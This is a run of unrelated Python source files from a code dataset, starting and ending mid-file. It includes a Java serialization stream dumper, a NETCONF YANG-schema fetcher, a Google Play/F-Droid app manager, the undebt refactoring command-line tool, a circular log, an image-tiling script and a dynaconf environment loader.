Constants.SC_EXTERNALIZABLE != 0\n sflag = flags & Constants.SC_SERIALIZABLE != 0\n hasWriteObjectData = flags & Constants.SC_WRITE_METHOD != 0\n hasBlockExternalData = flags & Constants.SC_BLOCK_DATA != 0\n if externalizable and sflag:\n print(\"serializable and externalizable flags conflict\")\n\n print(f\"className {className}\")\n print(f\"suid {suid}\")\n print(f\"number of fields {numFields}\")\n classDesc = JavaClass(className, suid, flags)\n classDesc.hasWriteObjectData = hasWriteObjectData\n classDesc.hasBlockExternalData = hasBlockExternalData\n handle = self.newHandles(classDesc)\n print(f\"TC_CLASSDESC new handle from {hex(handle)} className {className}\")\n fields = []\n for i in range(numFields):\n tcode = self.bin.readByte()\n fname = self.bin.readString()\n if tcode == b'L' or tcode == b'[':\n signature = self.readTypeString()\n else:\n signature = tcode.decode()\n fields.append({'name': fname, 'signature': signature})\n print(f\"name {fname} signature {signature}\")\n classDesc.fields = fields\n self.readClassAnnotations(classDesc)\n superjavaClass = self.readSuperClassDesc()\n classDesc.superJavaClass = superjavaClass\n return classDesc\n\n def readClassAnnotations(self, classDesc):\n \"\"\"\n Read the class annotations (extra class metadata)\n \"\"\"\n print(f\"ClassAnnotations start \")\n while True:\n __obj__ = self.readContent()\n classDesc.classAnnotations.append(__obj__)\n if isinstance(__obj__, JavaEndBlock):\n break\n\n print(f\"ClassAnnotations end \")\n\n def readSuperClassDesc(self):\n \"\"\"\n Read superclass descriptors until there is no superclass, like walking a linked list. Java has no multiple inheritance.\n :return:\n \"\"\"\n tc = self.bin.peekByte()\n print(f\"Super Class start\")\n if tc != Constants.TC_NULL:\n superJavaClass = self.readClassDescriptor()\n else:\n self.bin.readByte()\n superJavaClass = None\n print(f\"Super Class End\")\n return superJavaClass\n\n def readObject(self):\n tc = self.bin.readByte()\n if tc != Constants.TC_OBJECT:\n raise InvalidTypeCodeException(tc)\n tc = self.bin.peekByte()\n javaClass = None\n if tc == Constants.TC_CLASSDESC:\n javaClass = self.readClassDescriptor()\n elif tc == Constants.TC_NULL:\n return self.readNull()\n elif tc == Constants.TC_REFERENCE:\n javaClass = self.readHandle()\n elif tc == Constants.TC_PROXYCLASSDESC:\n javaClass = self.readProxyClassDescriptor()\n else:\n raise InvalidTypeCodeException(tc)\n\n javaObject = JavaObject(javaClass)\n handle = self.newHandles(javaObject)\n print(f\"readObject new handle from {hex(handle)}\")\n self.readClassData(javaObject)\n return javaObject\n\n def readClassData(self, javaObject):\n \"\"\"\n Read the object's field values: superclass fields first, then subclass fields\n :return:\n \"\"\"\n superClass = javaObject.javaClass\n superClassList = []\n while superClass:\n superClassList.append(superClass)\n superClass = superClass.superJavaClass\n\n while superClassList:\n classDesc = superClassList.pop()\n fields = classDesc.fields\n currentField = []\n for field in fields:\n signature = field['signature']\n value = self.readFieldValue(signature)\n javaField = JavaField(field['name'], signature, value)\n currentField.append(javaField)\n javaObject.fields.append(currentField)\n if classDesc.hasWriteObjectData:\n self.readObjectAnnotations(javaObject)\n\n def readHandle(self):\n \"\"\"\n A stream never repeats an identical value; the second occurrence is a back-reference to an existing handle\n :return:\n \"\"\"\n self.bin.readByte()\n handle = self.bin.readInt()\n print(hex(handle))\n handle = handle - Constants.baseWireHandle\n return self.handles[handle]\n\n def readTypeString(self):\n tc = self.bin.peekByte()\n if tc == Constants.TC_NULL:\n return self.readNull()\n elif tc == Constants.TC_REFERENCE:\n return self.readHandle()\n elif tc == Constants.TC_STRING:\n return self.readString()\n elif tc == Constants.TC_LONGSTRING:\n return self.readString()\n else:\n raise InvalidTypeCodeException(tc)\n\n def readString(self):\n self.bin.readByte()\n string = self.bin.readString()\n javaString = JavaString(string)\n handle = self.newHandles(javaString)\n print(f\"readString new handle from {hex(handle)} value {string}\")\n return javaString\n\n def readContent(self):\n tc = self.bin.peekByte()\n if tc == Constants.TC_NULL:\n return self.readNull()\n elif tc == Constants.TC_REFERENCE:\n return self.readHandle()\n elif tc == Constants.TC_CLASS:\n self.bin.readByte()\n clazz = self.readClassDescriptor()\n handle = self.newHandles(clazz)\n print(f\"TC_CLASS new handle from {hex(handle)}\")\n return clazz\n elif tc == Constants.TC_CLASSDESC:\n return self.readClassDescriptor()\n elif tc == Constants.TC_PROXYCLASSDESC:\n return self.readProxyClassDescriptor()\n elif tc == Constants.TC_STRING or tc == Constants.TC_LONGSTRING:\n return self.readTypeString()\n elif tc == Constants.TC_ENUM:\n return self.readEnum()\n elif tc == Constants.TC_OBJECT:\n return self.readObject()\n elif tc == Constants.TC_EXCEPTION:\n return self.readException()\n elif tc == Constants.TC_RESET:\n self.readReset()\n elif tc == Constants.TC_ARRAY:\n return self.readArray()\n elif tc == Constants.TC_BLOCKDATA:\n return self.readBlockData()\n elif tc == Constants.TC_BLOCKDATALONG:\n return self.readLongBLockData()\n elif tc == Constants.TC_ENDBLOCKDATA:\n return self.readEndBlock()\n else:\n raise InvalidTypeCodeException(tc)\n\n def readBlockData(self):\n self.bin.readByte()\n length = int.from_bytes(self.bin.readByte(), 'big')\n data = self.bin.readBytes(length)\n print(data)\n blockData = JavaBLockData(length, data)\n return blockData\n\n def readEndBlock(self):\n self.bin.readByte()\n endBD = JavaEndBlock()\n return endBD\n\n def readObjectAnnotations(self, javaObject):\n print(\"reading readObjectAnnotations\")\n while True:\n __obj__ = self.readContent()\n javaObject.objectAnnotation.append(__obj__)\n if isinstance(__obj__, JavaEndBlock):\n break\n\n def readNull(self):\n self.bin.readByte()\n return 'null'\n\n def readArray(self):\n self.bin.readByte()\n tc = self.bin.peekByte()\n javaClass = None\n if tc == Constants.TC_CLASSDESC:\n javaClass = self.readClassDescriptor()\n elif tc == Constants.TC_REFERENCE:\n javaClass = self.readHandle()\n else:\n print(\"unsupported type\")\n size = self.bin.readInt()\n print(javaClass)\n print(f\"array size {size}\")\n javaarray = JavaArray(size, javaClass)\n handle = self.newHandles(javaarray)\n print(f\"TC_ARRAY new handle from {hex(handle)}\")\n for i in range(size):\n signature = javaClass.name[1:]\n javaarray.add(self.readFieldValue(signature))\n return javaarray\n\n def readFieldValue(self, signature: str):\n \"\"\"\n Read a field value according to its type signature\n \"\"\"\n if signature.startswith(\"L\") or signature.startswith(\"[\"):\n return self.readContent()\n elif signature == 'B':\n return self.bin.readByte()\n elif signature == 'C':\n return self.bin.readChar()\n elif signature == 'D':\n return self.bin.readDouble()\n elif signature == 'F':\n return self.bin.readFloat()\n elif signature == 'I':\n return self.bin.readInt()\n elif signature == 'J':\n return self.bin.readLong()\n elif signature == 'S':\n return self.bin.readShort()\n elif signature == \"Z\":\n return self.bin.readBoolean()\n else:\n print(f\"unsupported signature {signature}\")\n\n def readEnum(self):\n self.bin.readByte()\n javaClass = self.readClassDescriptor()\n javaEnum = JavaEnum(javaClass)\n handle = self.newHandles(javaEnum)\n print(f\"read enum new handle {handle}\")\n enumConstantName = self.readContent()\n javaEnum.enumConstantName = enumConstantName\n return javaEnum\n\n def readReset(self):\n self.bin.readByte()\n self.handles = []\n\n def readException(self):\n self.bin.readByte()\n self.handles = []\n exception = self.readObject()\n self.handles = []\n javaException = JavaException(exception)\n return javaException\n\n def readLongBLockData(self):\n self.bin.readByte()\n length = int.from_bytes(self.bin.readBytes(4), 'big')\n data = self.bin.readBytes(length)\n print(data)\n blockData = JavaLongBLockData(length, data)\n return blockData\n","sub_path":"serializationDump.py","file_name":"serializationDump.py","file_ext":"py","file_size_in_byte":14692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
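The deserializer in the record above starts by validating the java.io stream header: magic 0xACED followed by version 0x0005, both big-endian unsigned shorts. Standalone, the check is just:

import io
import struct

STREAM_MAGIC, STREAM_VERSION = 0xACED, 5

def check_header(stream):
    # Two big-endian unsigned shorts open every Java serialization stream.
    magic, version = struct.unpack('>HH', stream.read(4))
    if (magic, version) != (STREAM_MAGIC, STREAM_VERSION):
        raise ValueError('bad stream header: %04x / %d' % (magic, version))

check_header(io.BytesIO(bytes.fromhex('aced0005')))  # passes silently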
+{"seq_id":"338369054","text":"from .sitetree import SiteTree\n\nclass SiteTreeAPI(object):\n\n def __init__(self, mongo_uri):\n\n self.tree = SiteTree(domain='', chroot='/', mongo_uri=mongo_uri)\n\n def urls(self, domain, chroot='/'):\n\n self.tree.domain = domain\n self.tree.chroot = chroot\n if self.tree.sync():\n for url in self.tree.walk():\n yield url\n\n","sub_path":"sitetree/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"231704982","text":"#!/usr/bin/env python\n\n\"\"\"\n Netconf python example by yang-explorer (https://github.com/CiscoDevNet/yang-explorer)\n\n Installing python dependencies:\n > pip install lxml ncclient\n\n Running script: (save as example.py)\n > python example.py -a 192.168.0.122 -u netconf -p cisco --port 830\n#Testing github. THis should appear in the fix a bug branch!\n\"\"\"\n\nimport lxml.etree as ET\nfrom argparse import ArgumentParser\nfrom ncclient import manager\nfrom ncclient.operations import RPCError\n\npayload = \"\"\"\n \n snmpevents \n \n\"\"\"\n\npayload_int=\"\"\"\n\n \n \n \n \n \n \n \n GigabitEthernet2 \n ianaift:ethernetCsmacd \n true \n \n \n \n \n \n\"\"\"\n\ninterfaces_payload=\"\"\"\n\n \n \n \n \n \n \n \n\"\"\"\n\n\nif __name__ == '__main__':\n\n parser = ArgumentParser(description='Usage:')\n\n # script arguments\n parser.add_argument('-a', '--host', type=str, required=False, default='192.168.0.122',\n help=\"Device IP address or Hostname\")\n parser.add_argument('-u', '--username', type=str, required=False, default='netconf',\n help=\"Device Username (netconf agent username)\")\n parser.add_argument('-p', '--password', type=str, required=False, default='cisco',\n help=\"Device Password (netconf agent password)\")\n parser.add_argument('--port', type=int, default=830,\n help=\"Netconf agent port\")\n args = parser.parse_args()\n\n # connect to netconf agent\n with manager.connect(host=args.host,\n port=args.port,\n username=args.username,\n password=args.password,\n timeout=90,\n hostkey_verify=False,\n device_params={'name': 'csr'}) as m:\n\n # execute netconf operation\n #response = m.dispatch(ET.fromstring(payload_int)).xml\n #response = m.get_config('running').xml\n #data = ET.fromstring(response)\n\n yang_schemas=['ietf-ip','ietf-interfaces','ietf-yang-types','ietf-inet-types']\n\n\n for zz in yang_schemas:\n schema = m.get_schema(zz)\n root = ET.fromstring((schema.xml).encode('ascii')) #.encode ascii is required otherwise we get an error\n #print(schema.xml) # Test Code Only\n #Now we need to extract the yang and write it to a file.\n yang_text = list(root)[0].text\n with open(zz + \".yang\",\"w+\") as f:\n f.write(yang_text)\n","sub_path":"netconf-int.py","file_name":"netconf-int.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"568750015","text":"from gpapi.googleplay import GooglePlayAPI, LoginError, RequestError\nfrom pyaxmlparser import APK\nfrom subprocess import Popen, PIPE\n\nimport base64\nimport os\nimport sys\nimport concurrent.futures\nfrom datetime import datetime as dt\nfrom shutil import move\n\nNOT_LOGGED_IN_ERR = 'Not logged in'\nWRONG_CREDENTIALS_ERR = 'Wrong credentials'\nSESSION_EXPIRED_ERR = 'Session tokens expired, re-login needed'\nFDROID_ERR = 'Error while executing fdroidserver tool'\n\n\ndef makeError(message):\n return {'status': 'ERROR',\n 'message': message}\n\n\ndef get_details_from_apk(apk, downloadPath, service):\n if apk is not None:\n filepath = os.path.join(downloadPath, apk)\n try:\n a = APK(filepath)\n except Exception as e:\n print(e)\n return None\n print('Fetching details for %s' % a.package)\n try:\n details = service.details(a.package)\n details['filename'] = apk\n except RequestError as e:\n print('Cannot fetch information for %s' % a.package)\n print('Extracting basic information from package...')\n return {'docId': a.package,\n 'filename': apk,\n 'versionCode': int(a.version_code),\n 'title': a.application}\n print('Added %s to cache' % details['docId'])\n return details\n\n\nclass Play(object):\n def __init__(self, debug=True, fdroid=False):\n self.currentSet = []\n self.totalNumOfApps = 0\n self.debug = debug\n self.fdroid = fdroid\n self.firstRun = True\n self.loggedIn = False\n self._email = None\n self._passwd = None\n self._last_fdroid_update = None\n\n # configuring download folder\n if self.fdroid:\n self.download_path = os.path.join(os.getcwd(), 'repo')\n else:\n self.download_path = os.getcwd()\n\n # configuring fdroid data\n if self.fdroid:\n self.fdroid_exe = 'fdroid'\n self.fdroid_path = os.getcwd()\n self.fdroid_init()\n\n self.service = GooglePlayAPI(self.debug)\n\n def fdroid_init(self):\n found = False\n for path in os.environ['PATH'].split(':'):\n exe = os.path.join(path, self.fdroid_exe)\n if os.path.isfile(exe):\n found = True\n break\n if not found:\n print('Please install fdroid')\n sys.exit(1)\n elif os.path.isfile('./config.py'):\n print('Repo already initalized, skipping')\n else:\n p = Popen([self.fdroid_exe, 'init', '-v'], stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n if p.returncode != 0:\n sys.stderr.write(\"error initializing fdroid repository \" +\n stderr.decode('utf-8'))\n sys.exit(1)\n # backup config.py\n if self.debug:\n print('Backing up config.py')\n move('./config.py', './config-backup.py')\n with open('./config-backup.py') as f1:\n content = f1.readlines()\n # copy all content of backup in the main config.py\n # if the file was not modified with custom values, do it\n with open('./config.py', 'w') as f:\n modified = False\n for line in content:\n if '# playmaker' in line:\n modified = True\n f.write(line)\n if not modified:\n if self.debug:\n print('Appending playmaker data to config.py')\n f.write('\\n# playmaker\\nrepo_name = \"playmaker\"\\n'\n 'repo_description = \"repository managed with '\n 'playmaker https://github.com/NoMore201/playmaker\"\\n')\n os.chmod('./config.py', 0o600)\n\n # ensure all folder and files are setup\n p = Popen([self.fdroid_exe, 'update', '--create-key', '-v'], stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n if p.returncode != 0:\n sys.stderr.write(\"error initializing fdroid repository \" +\n stderr.decode('utf-8'))\n else:\n print('Fdroid repo initialized successfully')\n\n def get_last_fdroid_update(self):\n return {'status': 'SUCCESS',\n 'message': 
str(self._last_fdroid_update)}\n\n def fdroid_update(self):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n if self.fdroid:\n try:\n p = Popen([self.fdroid_exe, 'update', '-c', '--clean'],\n stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n if p.returncode != 0:\n sys.stderr.write(\"error updating fdroid repository \" +\n stderr.decode('utf-8'))\n return makeError(FDROID_ERR)\n else:\n print('Fdroid repo updated successfully')\n self._last_fdroid_update = dt.today().replace(microsecond=0)\n return {'status': 'SUCCESS'}\n except Exception as e:\n return makeError(FDROID_ERR)\n else:\n return {'status': 'SUCCESS'}\n\n def get_apps(self):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n if self.firstRun:\n return {'status': 'PENDING',\n 'total': self.totalNumOfApps,\n 'current': len(self.currentSet)}\n return {'status': 'SUCCESS',\n 'message': sorted(self.currentSet, key=lambda k: k['title'])}\n\n def login(self, email=None, password=None):\n def unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n try:\n if email is not None and password is not None:\n self._email = base64.b64decode(email).decode('utf-8')\n self._passwd = base64.b64decode(password).decode('utf-8')\n self.service.login(self._email,\n self._passwd,\n None, None)\n else:\n # otherwise we need only to refresh auth token\n encrypted = self.service.encrypt_password(self._email,\n self._passwd).decode('utf-8')\n self.service.getAuthSubToken(self._email,\n encrypted)\n self.loggedIn = True\n return {'status': 'SUCCESS', 'message': 'OK'}\n except LoginError as e:\n print('Wrong credentials: {0}'.format(e))\n return {'status': 'ERROR',\n 'message': 'Wrong credentials'}\n except RequestError as e:\n # probably tokens are invalid, so it is better to\n # invalidate them\n print(e)\n return {'status': 'ERROR',\n 'message': 'Request error, probably invalid token'}\n\n def update_state(self):\n print('Updating cache')\n with concurrent.futures.ProcessPoolExecutor() as executor:\n # get application ids from apk files\n apkFiles = [apk for apk in os.listdir(self.download_path)\n if os.path.splitext(apk)[1] == '.apk']\n self.totalNumOfApps = len(apkFiles)\n if self.totalNumOfApps != 0:\n future_to_app = [executor.submit(get_details_from_apk,\n a,\n self.download_path,\n self.service)\n for a in apkFiles]\n for future in concurrent.futures.as_completed(future_to_app):\n app = future.result()\n if app is not None:\n self.currentSet.append(app)\n print('Cache correctly initialized')\n self.firstRun = False\n\n def insert_app_into_state(self, newApp):\n found = False\n result = list(filter(lambda x: x['docId'] == newApp['docId'],\n self.currentSet))\n if len(result) > 0:\n found = True\n if self.debug:\n print('%s is already cached, updating..' % newApp['docId'])\n i = self.currentSet.index(result[0])\n self.currentSet[i] = newApp\n if not found:\n if self.debug:\n print('Adding %s into cache..' 
% newApp['docId'])\n self.currentSet.append(newApp)\n\n def search(self, appName, numItems=15):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n try:\n apps = self.service.search(appName, numItems, None)\n except RequestError as e:\n print(e)\n self.loggedIn = False\n return {'status': 'ERROR',\n 'message': SESSION_EXPIRED_ERR}\n except LoginError as e:\n print(SESSION_EXPIRED_ERR)\n self.loggedIn = False\n return {'status': 'ERROR',\n 'message': SESSION_EXPIRED_ERR}\n except IndexError as e:\n print(SESSION_EXPIRED_ERR)\n self.loggedIn = False\n return {'status': 'ERROR',\n 'message': SESSION_EXPIRED_ERR}\n\n return {'status': 'SUCCESS',\n 'message': apps}\n\n def details(self, app):\n try:\n details = self.service.details(app)\n except RequestError:\n details = None\n return details\n\n def get_bulk_details(self, apksList):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n try:\n apps = [self.details(a) for a in apksList]\n except LoginError as e:\n print(e)\n self.loggedIn = False\n return apps\n\n def download_selection(self, appNames):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n success = []\n failed = []\n unavail = []\n\n for app in appNames:\n details = self.details(app)\n if details is None:\n print('Package %s does not exist' % app)\n unavail.append(app)\n continue\n print('Downloading %s' % app)\n try:\n if details['offer'][0]['formattedAmount'] == 'Free':\n data = self.service.download(app, details['versionCode'])\n else:\n data = self.service.delivery(app, details['versionCode'])\n except IndexError as exc:\n print(exc)\n print('Package %s does not exist' % app)\n unavail.append(app)\n except Exception as exc:\n print(exc)\n print('Failed to download %s' % app)\n failed.append(app)\n else:\n filename = app + '.apk'\n filepath = os.path.join(self.download_path, filename)\n try:\n open(filepath, 'wb').write(data['data'])\n except IOError as exc:\n print('Error while writing %s: %s' % (filename, exc))\n failed.append(app)\n details['filename'] = filename\n success.append(details)\n for x in success:\n self.insert_app_into_state(x)\n return {'status': 'SUCCESS',\n 'message': {'success': success,\n 'failed': failed,\n 'unavail': unavail}}\n\n def check_local_apks(self):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n if len(self.currentSet) == 0:\n print('There is no package')\n return {'status': 'SUCCESS',\n 'message': []}\n else:\n toUpdate = []\n for app in self.currentSet:\n details = self.details(app['docId'])\n if details is None:\n print('%s not available in Play Store' % app['docId'])\n continue\n if self.debug:\n print('Checking %s' % app['docId'])\n print('%d == %d ?' % (app['versionCode'], details['versionCode']))\n if app['versionCode'] != details['versionCode']:\n toUpdate.append(details['docId'])\n return {'status': 'SUCCESS',\n 'message': toUpdate}\n\n def remove_local_app(self, docId):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n # get app from cache\n app = list(filter(lambda x: x['docId'] == docId, self.currentSet))\n if len(app) < 1:\n return {'status': 'ERROR'}\n apkPath = os.path.join(self.download_path, app[0]['filename'])\n if os.path.isfile(apkPath):\n os.remove(apkPath)\n self.currentSet.remove(app[0])\n return {'status': 'SUCCESS'}\n return {'status': 'ERROR'}\n","sub_path":"playmaker/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":12877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
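update_state in the playmaker service above fans metadata lookups out over a process pool and collects results as they finish. Here is the same pattern in isolation, a sketch with a stand-in work function (slow_square is hypothetical, standing in for get_details_from_apk):

import concurrent.futures

def slow_square(n):
    # Stand-in for the real per-APK work; any picklable top-level function works.
    return n * n

if __name__ == '__main__':
    items = [1, 2, 3, 4, 5]
    results = []
    with concurrent.futures.ProcessPoolExecutor() as executor:
        futures = [executor.submit(slow_square, n) for n in items]
        # as_completed yields futures in finish order, not submit order.
        for future in concurrent.futures.as_completed(futures):
            results.append(future.result())
    print(sorted(results))  # [1, 4, 9, 16, 25]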
+{"seq_id":"426660528","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport multiprocessing\nimport os\nimport sys\nimport time\nimport traceback\n\nfrom undebt.cmd import logger\nfrom undebt.cmd.logger import log\nfrom undebt.cmd.logic import process\nfrom undebt.pattern.interface import patterns_from_files\n\n\ndef _exit_fail_upon_error(func):\n\n def try_except(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except Exception as err:\n log.exception(str(err))\n sys.exit(1)\n\n return try_except\n\n\n@_exit_fail_upon_error\ndef _load_text(path):\n if path is None:\n file_obj = sys.stdin\n else:\n file_obj = open(path, 'r')\n\n try:\n return file_obj.read()\n finally:\n if path:\n file_obj.close()\n\n\n@_exit_fail_upon_error\ndef _write_result_text(result_text, path, dry_run):\n if not dry_run and path:\n with open(path, 'w') as file_obj:\n file_obj.write(result_text)\n else:\n if path:\n print('>>> {}'.format(path), file=sys.stderr)\n sys.stdout.write(result_text)\n\n\n@_exit_fail_upon_error\ndef _handle_arguments():\n parser = argparse.ArgumentParser(prog='undebt')\n parser.add_argument(\n 'paths', nargs='*', metavar='PATH',\n help='paths to files or directories (searches for extension recursively) to be modified; '\n 'uses stdin if not passed')\n parser.add_argument(\n '--pattern', '-p', metavar='PATH', action='append', required=True,\n help='paths to pattern definition files')\n parser.add_argument(\n '--extension', '-e', metavar='EXT', action='append',\n help='extensions of files to be modified when searching a directory')\n parser.add_argument(\n '--jobs', '-j', metavar='INTEGER', type=int, default=16,\n help='number of processes to run in parallel (default is 16)')\n parser.add_argument(\n '--verbose', '-v', action='store_true', default=False,\n help='verbose logging for troubleshooting')\n parser.add_argument(\n '--dry-run', '-d', action='store_true', default=False,\n help='only print to stdout; do not overwrite files')\n return parser.parse_args()\n\n\n@_exit_fail_upon_error\ndef _fix_exts(extensions):\n if extensions is None:\n return None\n\n new_exts = []\n for ext in extensions:\n if ext.startswith(\".\"):\n new_exts.append(ext[1:])\n else:\n new_exts.append(ext)\n return new_exts\n\n\n@_exit_fail_upon_error\ndef _find_files(paths, extensions):\n if paths is None:\n return\n\n for path in paths:\n\n if os.path.isfile(path):\n yield path\n\n else:\n for root, dirs, files in os.walk(path):\n\n for f in files:\n ext = os.path.splitext(f)[-1].lstrip('.')\n\n if extensions is None:\n log.error('must pass --extension when --input is a directory')\n sys.exit(1)\n\n if ext in extensions:\n yield os.path.join(root, f)\n\n for d in dirs[:]:\n if d != \".\" * len(d) and d.startswith(\".\"): # ignore .*\n dirs.remove(d)\n\n\ndef _process_file(patterns, text_file, dry_run):\n log.info('undebting {}'.format(text_file))\n\n text = _load_text(text_file)\n\n try:\n result_text = process(patterns, text)\n except Exception:\n log.exception(traceback.format_exc())\n return False\n else:\n if result_text != text:\n _write_result_text(result_text, text_file, dry_run)\n return True\n\n\nclass _file_processor(object):\n \"\"\"Must be a class so it is pickleable.\"\"\"\n\n def __init__(self, pattern_files, dry_run):\n self.pattern_files = pattern_files\n self.dry_run = dry_run\n\n @_exit_fail_upon_error\n def patterns(self):\n return 
patterns_from_files(self.pattern_files)\n\n def __call__(self, text_file):\n return _process_file(self.patterns(), text_file, self.dry_run)\n\n\ndef main():\n \"\"\"Handle and process arguments from sys.argv.\"\"\"\n logger.setup()\n args = _handle_arguments()\n logger.setup(args.verbose) # Reset logging level\n\n if args.jobs <= 0:\n log.error('number of processes must be > 0')\n sys.exit(1)\n\n processor = _file_processor(args.pattern, args.dry_run)\n files = list(_find_files(args.paths, _fix_exts(args.extension)))\n\n if bool(files) != bool(args.paths):\n log.error('could not find any files for the given paths and extension')\n sys.exit(1)\n\n if not files: # Single process mode if stdin\n log.info('running in stdin/stdout mode')\n processor(None)\n\n elif len(files) == 1 or args.jobs == 1: # Single process if only one file or only one process\n log.info('running across {} file(s) using a single process'\n .format(len(files)))\n processor(files[0])\n\n else:\n process_pool = multiprocessing.Pool(args.jobs)\n try:\n\n result = process_pool.map_async(\n processor,\n files,\n )\n process_pool.close()\n\n log.info('running across {} file(s) using {} processes'\n .format(len(files), args.jobs))\n\n # Cannot do process_pool.wait() because it prevents KeyboardInterrupt from being sent\n # See http://stackoverflow.com/questions/1408356/keyboard-interrupts-with-pythons-multiprocessing-pool\n while not result.ready():\n time.sleep(0.01)\n\n if not result.successful():\n log.error('multiprocessing failed (are your replace functions pickleable?)')\n sys.exit(1)\n\n result = result.get()\n assert len(result) == len(files)\n if not all(result):\n log.error('failed to process {} files'\n .format(len(result) - sum(result)))\n sys.exit(1)\n\n except:\n process_pool.terminate()\n raise\n finally:\n process_pool.join()\n","sub_path":"undebt/cmd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
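The worker-pool section of undebt's main() deliberately avoids a blocking wait so Ctrl-C still reaches the parent process; it polls result.ready() instead, as its own comment notes. A minimal standalone sketch of that pattern (the worker function is a placeholder):

import multiprocessing
import time

def work(x):
    # Placeholder worker; must be a picklable top-level function.
    return x + 1

if __name__ == '__main__':
    pool = multiprocessing.Pool(4)
    try:
        result = pool.map_async(work, range(10))
        pool.close()
        # Polling keeps the main process responsive to KeyboardInterrupt,
        # which a blocking wait() can swallow on some platforms.
        while not result.ready():
            time.sleep(0.01)
        print(result.get())
    except KeyboardInterrupt:
        pool.terminate()
        raise
    finally:
        pool.join()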
+{"seq_id":"536691697","text":"\"\"\"\nThis problem was asked by Twitter.\n\nYou run an e-commerce website and want to record the last N order ids in a log.\nImplement a data structure to accomplish this, with the following API:\n\n * record(order_id): adds the order_id to the log\n * get_last(i): gets the ith last element from the log. i is guaranteed to be\n smaller than or equal to N.\n\nYou should be as efficient with time and space as possible.\n\"\"\"\nclass Log:\n def __init__(self, size):\n self.size = size\n self.data = [None for i in range(size)]\n self.f = -1\n self.r = -1\n\n\n def record(self, order_id):\n self.f = (self.f + 1) % self.size\n if self.r == -1 or self.f == self.r:\n self.r = (self.r + 1) % self.size\n\n self.data[self.f] = order_id\n\n\n def get_last(self, i):\n index = (self.f - i + 1 + self.size) % self.size\n return self.data[index]\n\n\n def __str__(self):\n result = \"Log :\"\n index = self.r\n while index != self.f:\n result += \"\\n\\t{}\".format(self.data[index])\n index = (index + 1) % self.size\n result += \"\\n\\t{}\".format(self.data[index])\n result += \"\\n\\n\"\n return result\n\n\nif __name__ == '__main__':\n log = Log(3)\n\n log.record(\"US123\")\n print(log)\n log.record(\"US456\")\n print(log)\n log.record(\"US789\")\n print(log)\n log.record(\"UK123\")\n print(log)\n log.record(\"UK456\")\n print(log)\n\n print(log.get_last(1))\n print(log.get_last(2))\n print(log.get_last(3))\n","sub_path":"problems/dcp0016.py","file_name":"dcp0016.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"39287344","text":"# ex17_3.py\nfrom PIL import Image\n\nmywidth, myheight = 99, 127\nhungPic = Image.open(\"hung.jpg\") # 建立Pillow物件\nwidth, height = hungPic.size\nnewPic = hungPic.resize((mywidth, myheight))\n\nwidth, height = 634, 548 # 新影像寬與高\nnewImage = Image.new('RGB', (width, height), \"Yellow\") # 建立新影像\nfor x in range(20, width-20, mywidth): # 雙層迴圈合成\n for y in range(20, height-20, myheight):\n newImage.paste(newPic, (x, y)) # 合成\n\nnewImage.save(\"fig17_3.jpg\") # 儲存\n\n\n\n\n\n\n\n\n\n","sub_path":"04_The_Path_of_Python/T-resource_Python_201904/ex/ex17_3.py","file_name":"ex17_3.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"306373895","text":"# coding: utf-8\nimport os\nfrom dynaconf.utils.parse_conf import parse_conf_data\n\nIDENTIFIER = 'env_loader'\n\n\ndef load(obj, namespace=None, silent=True, key=None):\n default_namespace = obj.get('NAMESPACE_FOR_DYNACONF')\n # load all from default namespace (this never gets cleaned)\n load_from_env(\n IDENTIFIER,\n key,\n default_namespace,\n obj,\n silent\n )\n\n # rewrite with different namespace if provided\n if namespace and namespace != default_namespace:\n identifier = IDENTIFIER + '_' + namespace.lower()\n load_from_env(identifier, key, namespace, obj, silent)\n\n\ndef load_from_env(identifier, key, namespace, obj, silent):\n NAMESPACE = namespace.upper() # noqa\n NAMESPACE_ = '{0}_'.format(NAMESPACE) # noqa\n try:\n if key:\n value = os.environ.get(\n '{0}_{1}'.format(NAMESPACE, key)\n )\n if value:\n obj.logger.debug(\n \"env_loader:loading by key: %s:%s (%s)\",\n key,\n value,\n identifier\n )\n obj.set(key, value, loader_identifier=identifier)\n else:\n data = {\n key.partition(NAMESPACE_)[-1]: parse_conf_data(data)\n for key, data\n in os.environ.items()\n if key.startswith(NAMESPACE_)\n }\n obj.logger.debug(\n \"env_loader:loading:%s (%s)\",\n data,\n identifier\n )\n obj.update(data, loader_identifier=identifier)\n except Exception as e: # pragma: no cover\n e.message = (\n 'Unable to load config env namespace ({0})'\n ).format(str(e))\n if silent:\n obj.logger.error(str(e))\n else:\n raise\n\n\ndef clean(obj, namespace, silent=True): # noqa\n for identifier, data in obj.loaded_by_loaders.items():\n if identifier.startswith('env_loader'):\n for key in data:\n obj.logger.debug(\"cleaning: %s (%s)\", key, identifier)\n 